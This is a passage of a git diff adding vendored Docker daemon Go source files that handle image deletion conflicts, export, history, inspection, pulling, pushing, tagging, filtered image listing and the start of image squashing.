+			for _, repoRef := range repoRefs {
+				if _, repoRefIsCanonical := repoRef.(reference.Canonical); !repoRefIsCanonical && parsedRef.Name() == repoRef.Name() {
+					foundRepoTagRef = true
+					break
+				}
+			}
+			if !foundRepoTagRef {
+				// Remove canonical references from same repository
+				remainingRefs := []reference.Named{}
+				for _, repoRef := range repoRefs {
+					if _, repoRefIsCanonical := repoRef.(reference.Canonical); repoRefIsCanonical && parsedRef.Name() == repoRef.Name() {
+						if _, err := daemon.removeImageRef(repoRef); err != nil {
+							return records, err
+						}
+
+						untaggedRecord := types.ImageDelete{Untagged: repoRef.String()}
+						records = append(records, untaggedRecord)
+					} else {
+						remainingRefs = append(remainingRefs, repoRef)
+
+					}
+				}
+				repoRefs = remainingRefs
+			}
+		}
+
+		// If it has remaining references then the untag finished the remove
+		if len(repoRefs) > 0 {
+			return records, nil
+		}
+
+		removedRepositoryRef = true
+	} else {
+		// If an ID reference was given AND there is at most one tag
+		// reference to the image AND all references are within one
+		// repository, then remove all references.
+		if isSingleReference(repoRefs) {
+			c := conflictHard
+			if !force {
+				c |= conflictSoft &^ conflictActiveReference
+			}
+			if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil {
+				return nil, conflict
+			}
+
+			for _, repoRef := range repoRefs {
+				parsedRef, err := daemon.removeImageRef(repoRef)
+				if err != nil {
+					return nil, err
+				}
+
+				untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()}
+
+				daemon.LogImageEvent(imgID.String(), imgID.String(), "untag")
+				records = append(records, untaggedRecord)
+			}
+		}
+	}
+
+	if err := daemon.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil {
+		return nil, err
+	}
+
+	imageActions.WithValues("delete").UpdateSince(start)
+
+	return records, nil
+}
+
+// isSingleReference returns true when all references are from one repository
+// and there is at most one tag. Returns false for empty input.
+func isSingleReference(repoRefs []reference.Named) bool {
+	if len(repoRefs) <= 1 {
+		return len(repoRefs) == 1
+	}
+	var singleRef reference.Named
+	canonicalRefs := map[string]struct{}{}
+	for _, repoRef := range repoRefs {
+		if _, isCanonical := repoRef.(reference.Canonical); isCanonical {
+			canonicalRefs[repoRef.Name()] = struct{}{}
+		} else if singleRef == nil {
+			singleRef = repoRef
+		} else {
+			return false
+		}
+	}
+	if singleRef == nil {
+		// Just use first canonical ref
+		singleRef = repoRefs[0]
+	}
+	_, ok := canonicalRefs[singleRef.Name()]
+	return len(canonicalRefs) == 1 && ok
+}
+
+// isImageIDPrefix returns whether the given possiblePrefix is a prefix of the
+// given imageID.
+func isImageIDPrefix(imageID, possiblePrefix string) bool {
+	if strings.HasPrefix(imageID, possiblePrefix) {
+		return true
+	}
+
+	if i := strings.IndexRune(imageID, ':'); i >= 0 {
+		return strings.HasPrefix(imageID[i+1:], possiblePrefix)
+	}
+
+	return false
+}
+
+// getContainerUsingImage returns a container that was created using the given
+// imageID. Returns nil if there is no such container.
+func (daemon *Daemon) getContainerUsingImage(imageID image.ID) *container.Container {
+	return daemon.containers.First(func(c *container.Container) bool {
+		return c.ImageID == imageID
+	})
+}
+
+// removeImageRef attempts to parse and remove the given image reference from
+// this daemon's store of repository tag/digest references. The given
+// repositoryRef must not be an image ID but a repository name followed by an
+// optional tag or digest reference. If tag or digest is omitted, the default
+// tag is used. Returns the resolved image reference and an error.
+func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, error) {
+	ref = reference.WithDefaultTag(ref)
+	// Ignore the boolean value returned, as far as we're concerned, this
+	// is an idempotent operation and it's okay if the reference didn't
+	// exist in the first place.
+	_, err := daemon.referenceStore.Delete(ref)
+
+	return ref, err
+}
+
+// removeAllReferencesToImageID attempts to remove every reference to the given
+// imgID from this daemon's store of repository tag/digest references. Returns
+// on the first encountered error. Removed references are logged to this
+// daemon's event service. An "Untagged" types.ImageDelete is added to the
+// given list of records.
+func (daemon *Daemon) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDelete) error {
+	imageRefs := daemon.referenceStore.References(imgID.Digest())
+
+	for _, imageRef := range imageRefs {
+		parsedRef, err := daemon.removeImageRef(imageRef)
+		if err != nil {
+			return err
+		}
+
+		untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()}
+
+		daemon.LogImageEvent(imgID.String(), imgID.String(), "untag")
+		*records = append(*records, untaggedRecord)
+	}
+
+	return nil
+}
+
+// ImageDeleteConflict holds a soft or hard conflict and an associated error.
+// Implements the error interface.
+type imageDeleteConflict struct {
+	hard    bool
+	used    bool
+	imgID   image.ID
+	message string
+}
+
+func (idc *imageDeleteConflict) Error() string {
+	var forceMsg string
+	if idc.hard {
+		forceMsg = "cannot be forced"
+	} else {
+		forceMsg = "must be forced"
+	}
+
+	return fmt.Sprintf("conflict: unable to delete %s (%s) - %s", stringid.TruncateID(idc.imgID.String()), forceMsg, idc.message)
+}
+
+// imageDeleteHelper attempts to delete the given image from this daemon. If
+// the image has any hard delete conflicts (child images or running containers
+// using the image) then it cannot be deleted. If the image has any soft delete
+// conflicts (any tags/digests referencing the image or any stopped container
+// using the image) then it can only be deleted if force is true. If the delete
+// succeeds and prune is true, the parent images are also deleted if they do
+// not have any soft or hard delete conflicts themselves. Any deleted images
+// and untagged references are appended to the given records. If any error or
+// conflict is encountered, it will be returned immediately without deleting
+// the image. If quiet is true, any encountered conflicts will be ignored and
+// the function will return nil immediately without deleting the image.
+func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDelete, force, prune, quiet bool) error {
+	// First, determine if this image has any conflicts. Ignore soft conflicts
+	// if force is true.
+	c := conflictHard
+	if !force {
+		c |= conflictSoft
+	}
+	if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil {
+		if quiet && (!daemon.imageIsDangling(imgID) || conflict.used) {
+			// Ignore conflicts UNLESS the image is "dangling" or not being used in
+			// which case we want the user to know.
+			return nil
+		}
+
+		// There was a conflict and it's either a hard conflict OR we are not
+		// forcing deletion on soft conflicts.
+		return conflict
+	}
+
+	parent, err := daemon.imageStore.GetParent(imgID)
+	if err != nil {
+		// There may be no parent
+		parent = ""
+	}
+
+	// Delete all repository tag/digest references to this image.
+	if err := daemon.removeAllReferencesToImageID(imgID, records); err != nil {
+		return err
+	}
+
+	removedLayers, err := daemon.imageStore.Delete(imgID)
+	if err != nil {
+		return err
+	}
+
+	daemon.LogImageEvent(imgID.String(), imgID.String(), "delete")
+	*records = append(*records, types.ImageDelete{Deleted: imgID.String()})
+	for _, removedLayer := range removedLayers {
+		*records = append(*records, types.ImageDelete{Deleted: removedLayer.ChainID.String()})
+	}
+
+	if !prune || parent == "" {
+		return nil
+	}
+
+	// We need to prune the parent image. This means delete it if there are
+	// no tags/digests referencing it and there are no containers using it (
+	// either running or stopped).
+	// Do not force prunings, but do so quietly (stopping on any encountered
+	// conflicts).
+	return daemon.imageDeleteHelper(parent, records, false, true, true)
+}
+
+// checkImageDeleteConflict determines whether there are any conflicts
+// preventing deletion of the given image from this daemon. A hard conflict is
+// any image which has the given image as a parent or any running container
+// using the image. A soft conflict is any tags/digest referencing the given
+// image or any stopped container using the image. If ignoreSoftConflicts is
+// true, this function will not check for soft conflict conditions.
+func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict {
+	// Check if the image has any descendant images.
+	if mask&conflictDependentChild != 0 && len(daemon.imageStore.Children(imgID)) > 0 {
+		return &imageDeleteConflict{
+			hard:    true,
+			imgID:   imgID,
+			message: "image has dependent child images",
+		}
+	}
+
+	if mask&conflictRunningContainer != 0 {
+		// Check if any running container is using the image.
+		running := func(c *container.Container) bool {
+			return c.IsRunning() && c.ImageID == imgID
+		}
+		if container := daemon.containers.First(running); container != nil {
+			return &imageDeleteConflict{
+				imgID:   imgID,
+				hard:    true,
+				used:    true,
+				message: fmt.Sprintf("image is being used by running container %s", stringid.TruncateID(container.ID)),
+			}
+		}
+	}
+
+	// Check if any repository tags/digest reference this image.
+	if mask&conflictActiveReference != 0 && len(daemon.referenceStore.References(imgID.Digest())) > 0 {
+		return &imageDeleteConflict{
+			imgID:   imgID,
+			message: "image is referenced in multiple repositories",
+		}
+	}
+
+	if mask&conflictStoppedContainer != 0 {
+		// Check if any stopped containers reference this image.
+		stopped := func(c *container.Container) bool {
+			return !c.IsRunning() && c.ImageID == imgID
+		}
+		if container := daemon.containers.First(stopped); container != nil {
+			return &imageDeleteConflict{
+				imgID:   imgID,
+				used:    true,
+				message: fmt.Sprintf("image is being used by stopped container %s", stringid.TruncateID(container.ID)),
+			}
+		}
+	}
+
+	return nil
+}
+
+// imageIsDangling returns whether the given image is "dangling" which means
+// that there are no repository references to the given image and it has no
+// child images.
+func (daemon *Daemon) imageIsDangling(imgID image.ID) bool {
+	return !(len(daemon.referenceStore.References(imgID.Digest())) > 0 || len(daemon.imageStore.Children(imgID)) > 0)
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_exporter.go b/vendor/github.com/docker/docker/daemon/image_exporter.go
new file mode 100644
index 0000000000..95d1d3dcdb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_exporter.go
@@ -0,0 +1,25 @@
+package daemon
+
+import (
+	"io"
+
+	"github.com/docker/docker/image/tarexport"
+)
+
+// ExportImage exports a list of images to the given output stream. The
+// exported images are archived into a tar when written to the output
+// stream. All images with the given tag and all versions containing
+// the same tag are exported. names is the set of tags to export, and
+// outStream is the writer which the images are written to.
+func (daemon *Daemon) ExportImage(names []string, outStream io.Writer) error {
+	imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon)
+	return imageExporter.Save(names, outStream)
+}
+
+// LoadImage uploads a set of images into the repository. This is the
+// complement of ImageExport.  The input stream is an uncompressed tar
+// ball containing images and metadata.
+func (daemon *Daemon) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error {
+	imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon)
+	return imageExporter.Load(inTar, outStream, quiet)
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_history.go b/vendor/github.com/docker/docker/daemon/image_history.go
new file mode 100644
index 0000000000..839dd1283b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_history.go
@@ -0,0 +1,84 @@
+package daemon
+
+import (
+	"fmt"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/reference"
+)
+
+// ImageHistory returns a slice of ImageHistory structures for the specified image
+// name by walking the image lineage.
+func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) {
+	start := time.Now()
+	img, err := daemon.GetImage(name)
+	if err != nil {
+		return nil, err
+	}
+
+	history := []*types.ImageHistory{}
+
+	layerCounter := 0
+	rootFS := *img.RootFS
+	rootFS.DiffIDs = nil
+
+	for _, h := range img.History {
+		var layerSize int64
+
+		if !h.EmptyLayer {
+			if len(img.RootFS.DiffIDs) <= layerCounter {
+				return nil, fmt.Errorf("too many non-empty layers in History section")
+			}
+
+			rootFS.Append(img.RootFS.DiffIDs[layerCounter])
+			l, err := daemon.layerStore.Get(rootFS.ChainID())
+			if err != nil {
+				return nil, err
+			}
+			layerSize, err = l.DiffSize()
+			layer.ReleaseAndLog(daemon.layerStore, l)
+			if err != nil {
+				return nil, err
+			}
+
+			layerCounter++
+		}
+
+		history = append([]*types.ImageHistory{{
+			ID:        "<missing>",
+			Created:   h.Created.Unix(),
+			CreatedBy: h.CreatedBy,
+			Comment:   h.Comment,
+			Size:      layerSize,
+		}}, history...)
+	}
+
+	// Fill in image IDs and tags
+	histImg := img
+	id := img.ID()
+	for _, h := range history {
+		h.ID = id.String()
+
+		var tags []string
+		for _, r := range daemon.referenceStore.References(id.Digest()) {
+			if _, ok := r.(reference.NamedTagged); ok {
+				tags = append(tags, r.String())
+			}
+		}
+
+		h.Tags = tags
+
+		id = histImg.Parent
+		if id == "" {
+			break
+		}
+		histImg, err = daemon.GetImage(id.String())
+		if err != nil {
+			break
+		}
+	}
+	imageActions.WithValues("history").UpdateSince(start)
+	return history, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_inspect.go b/vendor/github.com/docker/docker/daemon/image_inspect.go
new file mode 100644
index 0000000000..ebf912469c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_inspect.go
@@ -0,0 +1,82 @@
+package daemon
+
+import (
+	"fmt"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/reference"
+)
+
+// LookupImage looks up an image by name and returns it as an ImageInspect
+// structure.
+func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) {
+	img, err := daemon.GetImage(name)
+	if err != nil {
+		return nil, fmt.Errorf("No such image: %s", name)
+	}
+
+	refs := daemon.referenceStore.References(img.ID().Digest())
+	repoTags := []string{}
+	repoDigests := []string{}
+	for _, ref := range refs {
+		switch ref.(type) {
+		case reference.NamedTagged:
+			repoTags = append(repoTags, ref.String())
+		case reference.Canonical:
+			repoDigests = append(repoDigests, ref.String())
+		}
+	}
+
+	var size int64
+	var layerMetadata map[string]string
+	layerID := img.RootFS.ChainID()
+	if layerID != "" {
+		l, err := daemon.layerStore.Get(layerID)
+		if err != nil {
+			return nil, err
+		}
+		defer layer.ReleaseAndLog(daemon.layerStore, l)
+		size, err = l.Size()
+		if err != nil {
+			return nil, err
+		}
+
+		layerMetadata, err = l.Metadata()
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	comment := img.Comment
+	if len(comment) == 0 && len(img.History) > 0 {
+		comment = img.History[len(img.History)-1].Comment
+	}
+
+	imageInspect := &types.ImageInspect{
+		ID:              img.ID().String(),
+		RepoTags:        repoTags,
+		RepoDigests:     repoDigests,
+		Parent:          img.Parent.String(),
+		Comment:         comment,
+		Created:         img.Created.Format(time.RFC3339Nano),
+		Container:       img.Container,
+		ContainerConfig: &img.ContainerConfig,
+		DockerVersion:   img.DockerVersion,
+		Author:          img.Author,
+		Config:          img.Config,
+		Architecture:    img.Architecture,
+		Os:              img.OS,
+		OsVersion:       img.OSVersion,
+		Size:            size,
+		VirtualSize:     size, // TODO: field unused, deprecate
+		RootFS:          rootFSToAPIType(img.RootFS),
+	}
+
+	imageInspect.GraphDriver.Name = daemon.GraphDriverName()
+
+	imageInspect.GraphDriver.Data = layerMetadata
+
+	return imageInspect, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_pull.go b/vendor/github.com/docker/docker/daemon/image_pull.go
new file mode 100644
index 0000000000..2157d15974
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_pull.go
@@ -0,0 +1,149 @@
+package daemon
+
+import (
+	"io"
+	"strings"
+
+	dist "github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/distribution"
+	progressutils "github.com/docker/docker/distribution/utils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+// PullImage initiates a pull operation. image is the repository name to pull, and
+// tag may be either empty, or indicate a specific tag to pull.
+func (daemon *Daemon) PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+	// Special case: "pull -a" may send an image name with a
+	// trailing :. This is ugly, but let's not break API
+	// compatibility.
+	image = strings.TrimSuffix(image, ":")
+
+	ref, err := reference.ParseNamed(image)
+	if err != nil {
+		return err
+	}
+
+	if tag != "" {
+		// The "tag" could actually be a digest.
+		var dgst digest.Digest
+		dgst, err = digest.ParseDigest(tag)
+		if err == nil {
+			ref, err = reference.WithDigest(reference.TrimNamed(ref), dgst)
+		} else {
+			ref, err = reference.WithTag(ref, tag)
+		}
+		if err != nil {
+			return err
+		}
+	}
+
+	return daemon.pullImageWithReference(ctx, ref, metaHeaders, authConfig, outStream)
+}
+
+// PullOnBuild tells Docker to pull image referenced by `name`.
+func (daemon *Daemon) PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (builder.Image, error) {
+	ref, err := reference.ParseNamed(name)
+	if err != nil {
+		return nil, err
+	}
+	ref = reference.WithDefaultTag(ref)
+
+	pullRegistryAuth := &types.AuthConfig{}
+	if len(authConfigs) > 0 {
+		// The request came with a full auth config file, we prefer to use that
+		repoInfo, err := daemon.RegistryService.ResolveRepository(ref)
+		if err != nil {
+			return nil, err
+		}
+
+		resolvedConfig := registry.ResolveAuthConfig(
+			authConfigs,
+			repoInfo.Index,
+		)
+		pullRegistryAuth = &resolvedConfig
+	}
+
+	if err := daemon.pullImageWithReference(ctx, ref, nil, pullRegistryAuth, output); err != nil {
+		return nil, err
+	}
+	return daemon.GetImage(name)
+}
+
+func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.Named, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+	// Include a buffer so that slow client connections don't affect
+	// transfer performance.
+	progressChan := make(chan progress.Progress, 100)
+
+	writesDone := make(chan struct{})
+
+	ctx, cancelFunc := context.WithCancel(ctx)
+
+	go func() {
+		progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan)
+		close(writesDone)
+	}()
+
+	imagePullConfig := &distribution.ImagePullConfig{
+		Config: distribution.Config{
+			MetaHeaders:      metaHeaders,
+			AuthConfig:       authConfig,
+			ProgressOutput:   progress.ChanOutput(progressChan),
+			RegistryService:  daemon.RegistryService,
+			ImageEventLogger: daemon.LogImageEvent,
+			MetadataStore:    daemon.distributionMetadataStore,
+			ImageStore:       distribution.NewImageConfigStoreFromStore(daemon.imageStore),
+			ReferenceStore:   daemon.referenceStore,
+		},
+		DownloadManager: daemon.downloadManager,
+		Schema2Types:    distribution.ImageTypes,
+	}
+
+	err := distribution.Pull(ctx, ref, imagePullConfig)
+	close(progressChan)
+	<-writesDone
+	return err
+}
+
+// GetRepository returns a repository from the registry.
+func (daemon *Daemon) GetRepository(ctx context.Context, ref reference.NamedTagged, authConfig *types.AuthConfig) (dist.Repository, bool, error) {
+	// get repository info
+	repoInfo, err := daemon.RegistryService.ResolveRepository(ref)
+	if err != nil {
+		return nil, false, err
+	}
+	// makes sure name is not empty or `scratch`
+	if err := distribution.ValidateRepoName(repoInfo.Name()); err != nil {
+		return nil, false, err
+	}
+
+	// get endpoints
+	endpoints, err := daemon.RegistryService.LookupPullEndpoints(repoInfo.Hostname())
+	if err != nil {
+		return nil, false, err
+	}
+
+	// retrieve repository
+	var (
+		confirmedV2 bool
+		repository  dist.Repository
+		lastError   error
+	)
+
+	for _, endpoint := range endpoints {
+		if endpoint.Version == registry.APIVersion1 {
+			continue
+		}
+
+		repository, confirmedV2, lastError = distribution.NewV2Repository(ctx, repoInfo, endpoint, nil, authConfig, "pull")
+		if lastError == nil && confirmedV2 {
+			break
+		}
+	}
+	return repository, confirmedV2, lastError
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_push.go b/vendor/github.com/docker/docker/daemon/image_push.go
new file mode 100644
index 0000000000..e6382c7f27
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_push.go
@@ -0,0 +1,63 @@
+package daemon
+
+import (
+	"io"
+
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/distribution"
+	progressutils "github.com/docker/docker/distribution/utils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+	"golang.org/x/net/context"
+)
+
+// PushImage initiates a push operation on the repository named localName.
+func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+	ref, err := reference.ParseNamed(image)
+	if err != nil {
+		return err
+	}
+	if tag != "" {
+		// Push by digest is not supported, so only tags are supported.
+		ref, err = reference.WithTag(ref, tag)
+		if err != nil {
+			return err
+		}
+	}
+
+	// Include a buffer so that slow client connections don't affect
+	// transfer performance.
+	progressChan := make(chan progress.Progress, 100)
+
+	writesDone := make(chan struct{})
+
+	ctx, cancelFunc := context.WithCancel(ctx)
+
+	go func() {
+		progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan)
+		close(writesDone)
+	}()
+
+	imagePushConfig := &distribution.ImagePushConfig{
+		Config: distribution.Config{
+			MetaHeaders:      metaHeaders,
+			AuthConfig:       authConfig,
+			ProgressOutput:   progress.ChanOutput(progressChan),
+			RegistryService:  daemon.RegistryService,
+			ImageEventLogger: daemon.LogImageEvent,
+			MetadataStore:    daemon.distributionMetadataStore,
+			ImageStore:       distribution.NewImageConfigStoreFromStore(daemon.imageStore),
+			ReferenceStore:   daemon.referenceStore,
+		},
+		ConfigMediaType: schema2.MediaTypeImageConfig,
+		LayerStore:      distribution.NewLayerProviderFromStore(daemon.layerStore),
+		TrustKey:        daemon.trustKey,
+		UploadManager:   daemon.uploadManager,
+	}
+
+	err = distribution.Push(ctx, ref, imagePushConfig)
+	close(progressChan)
+	<-writesDone
+	return err
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_tag.go b/vendor/github.com/docker/docker/daemon/image_tag.go
new file mode 100644
index 0000000000..36fa3b462e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_tag.go
@@ -0,0 +1,37 @@
+package daemon
+
+import (
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/reference"
+)
+
+// TagImage creates the tag specified by newTag, pointing to the image named
+// imageName (alternatively, imageName can also be an image ID).
+func (daemon *Daemon) TagImage(imageName, repository, tag string) error {
+	imageID, err := daemon.GetImageID(imageName)
+	if err != nil {
+		return err
+	}
+
+	newTag, err := reference.WithName(repository)
+	if err != nil {
+		return err
+	}
+	if tag != "" {
+		if newTag, err = reference.WithTag(newTag, tag); err != nil {
+			return err
+		}
+	}
+
+	return daemon.TagImageWithReference(imageID, newTag)
+}
+
+// TagImageWithReference adds the given reference to the image ID provided.
+func (daemon *Daemon) TagImageWithReference(imageID image.ID, newTag reference.Named) error {
+	if err := daemon.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil {
+		return err
+	}
+
+	daemon.LogImageEvent(imageID.String(), newTag.String(), "tag")
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/images.go b/vendor/github.com/docker/docker/daemon/images.go
new file mode 100644
index 0000000000..88fb8f8e91
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images.go
@@ -0,0 +1,331 @@
+package daemon
+
+import (
+	"encoding/json"
+	"fmt"
+	"sort"
+	"time"
+
+	"github.com/pkg/errors"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+)
+
+var acceptedImageFilterTags = map[string]bool{
+	"dangling":  true,
+	"label":     true,
+	"before":    true,
+	"since":     true,
+	"reference": true,
+}
+
+// byCreated is a temporary type used to sort a list of images by creation
+// time.
+type byCreated []*types.ImageSummary
+
+func (r byCreated) Len() int           { return len(r) }
+func (r byCreated) Swap(i, j int)      { r[i], r[j] = r[j], r[i] }
+func (r byCreated) Less(i, j int) bool { return r[i].Created < r[j].Created }
+
+// Map returns a map of all images in the ImageStore
+func (daemon *Daemon) Map() map[image.ID]*image.Image {
+	return daemon.imageStore.Map()
+}
+
+// Images returns a filtered list of images. filterArgs is a JSON-encoded set
+// of filter arguments which will be interpreted by api/types/filters.
+// filter is a shell glob string applied to repository names. The argument
+// named all controls whether all images in the graph are filtered, or just
+// the heads.
+func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) {
+	var (
+		allImages    map[image.ID]*image.Image
+		err          error
+		danglingOnly = false
+	)
+
+	if err := imageFilters.Validate(acceptedImageFilterTags); err != nil {
+		return nil, err
+	}
+
+	if imageFilters.Include("dangling") {
+		if imageFilters.ExactMatch("dangling", "true") {
+			danglingOnly = true
+		} else if !imageFilters.ExactMatch("dangling", "false") {
+			return nil, fmt.Errorf("Invalid filter 'dangling=%s'", imageFilters.Get("dangling"))
+		}
+	}
+	if danglingOnly {
+		allImages = daemon.imageStore.Heads()
+	} else {
+		allImages = daemon.imageStore.Map()
+	}
+
+	var beforeFilter, sinceFilter *image.Image
+	err = imageFilters.WalkValues("before", func(value string) error {
+		beforeFilter, err = daemon.GetImage(value)
+		return err
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	err = imageFilters.WalkValues("since", func(value string) error {
+		sinceFilter, err = daemon.GetImage(value)
+		return err
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	images := []*types.ImageSummary{}
+	var imagesMap map[*image.Image]*types.ImageSummary
+	var layerRefs map[layer.ChainID]int
+	var allLayers map[layer.ChainID]layer.Layer
+	var allContainers []*container.Container
+
+	for id, img := range allImages {
+		if beforeFilter != nil {
+			if img.Created.Equal(beforeFilter.Created) || img.Created.After(beforeFilter.Created) {
+				continue
+			}
+		}
+
+		if sinceFilter != nil {
+			if img.Created.Equal(sinceFilter.Created) || img.Created.Before(sinceFilter.Created) {
+				continue
+			}
+		}
+
+		if imageFilters.Include("label") {
+			// Very old image that do not have image.Config (or even labels)
+			if img.Config == nil {
+				continue
+			}
+			// We are now sure image.Config is not nil
+			if !imageFilters.MatchKVList("label", img.Config.Labels) {
+				continue
+			}
+		}
+
+		layerID := img.RootFS.ChainID()
+		var size int64
+		if layerID != "" {
+			l, err := daemon.layerStore.Get(layerID)
+			if err != nil {
+				return nil, err
+			}
+
+			size, err = l.Size()
+			layer.ReleaseAndLog(daemon.layerStore, l)
+			if err != nil {
+				return nil, err
+			}
+		}
+
+		newImage := newImage(img, size)
+
+		for _, ref := range daemon.referenceStore.References(id.Digest()) {
+			if imageFilters.Include("reference") {
+				var found bool
+				var matchErr error
+				for _, pattern := range imageFilters.Get("reference") {
+					found, matchErr = reference.Match(pattern, ref)
+					if matchErr != nil {
+						return nil, matchErr
+					}
+				}
+				if !found {
+					continue
+				}
+			}
+			if _, ok := ref.(reference.Canonical); ok {
+				newImage.RepoDigests = append(newImage.RepoDigests, ref.String())
+			}
+			if _, ok := ref.(reference.NamedTagged); ok {
+				newImage.RepoTags = append(newImage.RepoTags, ref.String())
+			}
+		}
+		if newImage.RepoDigests == nil && newImage.RepoTags == nil {
+			if all || len(daemon.imageStore.Children(id)) == 0 {
+
+				if imageFilters.Include("dangling") && !danglingOnly {
+					//dangling=false case, so dangling image is not needed
+					continue
+				}
+				if imageFilters.Include("reference") { // skip images with no references if filtering by reference
+					continue
+				}
+				newImage.RepoDigests = []string{"<none>@<none>"}
+				newImage.RepoTags = []string{"<none>:<none>"}
+			} else {
+				continue
+			}
+		} else if danglingOnly && len(newImage.RepoTags) > 0 {
+			continue
+		}
+
+		if withExtraAttrs {
+			// lazyly init variables
+			if imagesMap == nil {
+				allContainers = daemon.List()
+				allLayers = daemon.layerStore.Map()
+				imagesMap = make(map[*image.Image]*types.ImageSummary)
+				layerRefs = make(map[layer.ChainID]int)
+			}
+
+			// Get container count
+			newImage.Containers = 0
+			for _, c := range allContainers {
+				if c.ImageID == id {
+					newImage.Containers++
+				}
+			}
+
+			// count layer references
+			rootFS := *img.RootFS
+			rootFS.DiffIDs = nil
+			for _, id := range img.RootFS.DiffIDs {
+				rootFS.Append(id)
+				chid := rootFS.ChainID()
+				layerRefs[chid]++
+				if _, ok := allLayers[chid]; !ok {
+					return nil, fmt.Errorf("layer %v was not found (corruption?)", chid)
+				}
+			}
+			imagesMap[img] = newImage
+		}
+
+		images = append(images, newImage)
+	}
+
+	if withExtraAttrs {
+		// Get Shared sizes
+		for img, newImage := range imagesMap {
+			rootFS := *img.RootFS
+			rootFS.DiffIDs = nil
+
+			newImage.SharedSize = 0
+			for _, id := range img.RootFS.DiffIDs {
+				rootFS.Append(id)
+				chid := rootFS.ChainID()
+
+				diffSize, err := allLayers[chid].DiffSize()
+				if err != nil {
+					return nil, err
+				}
+
+				if layerRefs[chid] > 1 {
+					newImage.SharedSize += diffSize
+				}
+			}
+		}
+	}
+
+	sort.Sort(sort.Reverse(byCreated(images)))
+
+	return images, nil
+}
+
+// SquashImage creates a new image with the diff of the specified image and the specified parent.
+// This new image contains only the layers from it's parent + 1 extra layer which contains the diff of all the layers in between.
+// The existing image(s) is not destroyed.
+// If no parent is specified, a new image with the diff of all the specified image's layers merged into a new layer that has no parents.
+func (daemon *Daemon) SquashImage(id, parent string) (string, error) {
+	img, err := daemon.imageStore.Get(image.ID(id))
+	if err != nil {
+		return "", err
+	}
+
+	var parentImg *image.Image
+	var parentChainID layer.ChainID
+	if len(parent) != 0 {
+		parentImg, err = daemon.imageStore.Get(image.ID(parent))
+		if err != nil {
+			return "", errors.Wrap(err, "error getting specified parent layer")
+		}
+		parentChainID = parentImg.RootFS.ChainID()
+	} else {
+		rootFS := image.NewRootFS()
+		parentImg = &image.Image{RootFS: rootFS}
+	}
+
+	l, err := daemon.layerStore.Get(img.RootFS.ChainID())
+	if err != nil {
+		return "", errors.Wrap(err, "error getting image layer")
+	}
+	defer daemon.layerStore.Release(l)
+
+	ts, err := l.TarStreamFrom(parentChainID)
+	if err != nil {
+		return "", errors.Wrapf(err, "error getting tar stream to parent")
+	}
+	defer ts.Close()
+
+	newL, err := daemon.layerStore.Register(ts, parentChainID)
+	if err != nil {
+		return "", errors.Wrap(err, "error registering layer")
+	}
+	defer daemon.layerStore.Release(newL)
+
+	var newImage image.Image
+	newImage = *img
+	newImage.RootFS = nil
+
+	var rootFS image.RootFS
+	rootFS = *parentImg.RootFS
+	rootFS.DiffIDs = append(rootFS.DiffIDs, newL.DiffID())
+	newImage.RootFS = &rootFS
+
